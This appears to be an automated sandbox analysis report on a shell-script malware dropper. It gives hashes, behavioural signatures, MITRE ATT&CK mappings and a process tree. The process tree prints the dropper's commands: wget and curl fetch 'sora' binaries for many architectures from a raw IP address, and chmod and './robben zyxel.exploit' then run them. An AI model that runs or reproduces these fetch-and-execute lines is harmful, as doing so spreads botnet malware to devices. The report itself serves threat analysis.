Analysis
max time kernel: 11s
max time network: 12s
platform: debian-9_armhf
resource: debian9-armhf-20240418-en
resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 18/10/2024, 03:03
Static task: static1
Behavioral task behavioral1: sample ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh, resource debian9-armhf-20240418-en
Behavioral task behavioral3: sample ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh, resource debian9-mipsbe-20240418-en
Behavioral task behavioral4: sample ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh, resource debian9-mipsel-20240611-en
General
Target: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Size: 2KB
MD5: eb7a4e59f642cd5475876f6ef1a09d3a
SHA1: 9232db0ebfe888067cc85a32b786a7ce41be0a6f
SHA256: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670
SHA512: 9393df90cc409e4f6ee6a2fc7df960123823ca22c25f01ae4e2ab094f74f71f0565925aa0384a5e84f4b15792d89317af71b1f223fa7fdd340b4404f9a25c6b8
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid / Process: 799 chmod, 819 chmod, 788 chmod, 690 chmod, 702 chmod, 739 chmod, 774 chmod, 812 chmod, 662 chmod, 825 chmod, 677 chmod, 727 chmod, 756 chmod, 714 chmod
Executes dropped EXE (14 IoCs)
ioc / pid / Process: /tmp/robben 665 robben, /tmp/robben 678 robben, /tmp/robben 691 robben, /tmp/robben 704 robben, /tmp/robben 716 robben, /tmp/robben 728 robben, /tmp/robben 741 robben, /tmp/robben 757 robben, /tmp/robben 776 robben, /tmp/robben 789 robben, /tmp/robben 801 robben, /tmp/robben 813 robben, /tmp/robben 820 robben, /tmp/robben 826 robben
Checks CPU configuration (1 TTPs, 14 IoCs)
Checks CPU information which indicates whether the system is a virtual machine.
description / ioc / Process: File opened for reading /proc/cpuinfo by curl (14 occurrences, one per curl process)
Reads runtime system information (28 IoCs)
description / ioc / Process: File opened for reading /proc/sys/crypto/fips_enabled by curl (14 occurrences); File opened for reading /proc/self/auxv by curl (14 occurrences)
System Network Configuration Discovery (1 TTPs, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
pid / Process: 667 wget, 675 curl, 676 cat
Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
description / ioc / Process: File opened for modification /tmp/robben by ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Processes (indentation shows process depth; columns: image | command line | PID | signatures)
/tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh | ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh | PID 639 | Writes file to tmp directory
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.x86 | PID 641
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.x86 | PID 649 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.x86 | PID 660
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 662 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 665 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.mips | PID 667 | System Network Configuration Discovery
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.mips | PID 675 | Checks CPU configuration; Reads runtime system information; System Network Configuration Discovery
  /bin/cat | cat sora.mips | PID 676 | System Network Configuration Discovery
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 677 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 678 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.x86_64 | PID 681
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.x86_64 | PID 684 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.x86_64 | PID 688
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 690 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 691 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.i468 | PID 694
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.i468 | PID 697 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.i468 | PID 700
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 702 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 704 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.i686 | PID 706
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.i686 | PID 709 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.i686 | PID 712
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 714 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 716 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.mpsl | PID 718
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.mpsl | PID 721 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.mpsl | PID 725
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 727 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 728 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.arm4 | PID 730
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.arm4 | PID 733 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.arm4 | PID 738
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 739 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 741 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.arm5 | PID 744
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.arm5 | PID 749 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.arm5 | PID 754
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 756 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 757 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.arm6 | PID 759
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.arm6 | PID 761 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.arm6 | PID 773
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 774 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 776 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.arm7 | PID 779
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.arm7 | PID 782 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.arm7 | PID 786
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 788 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 789 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.ppc | PID 792
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.ppc | PID 795 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.ppc | PID 798
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 799 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 801 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.ppc440fp | PID 804
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.ppc440fp | PID 807 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.ppc440fp | PID 810
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 812 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 813 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.m68k | PID 816
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.m68k | PID 817 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.m68k | PID 818
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 819 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 820 | Executes dropped EXE
  /usr/bin/wget | wget http://93.123.85.141/bins/sora.sh4 | PID 822
  /usr/bin/curl | curl -O http://93.123.85.141/bins/sora.sh4 | PID 823 | Checks CPU configuration; Reads runtime system information
  /bin/cat | cat sora.sh4 | PID 824
  /bin/chmod | chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-y6qRHz | PID 825 | File and Directory Permissions Modification
  /tmp/robben | ./robben zyxel.exploit | PID 826 | Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification (1)
Linux and Mac File and Directory Permissions Modification (1)
Virtualization/Sandbox Evasion (1)
System Checks (1)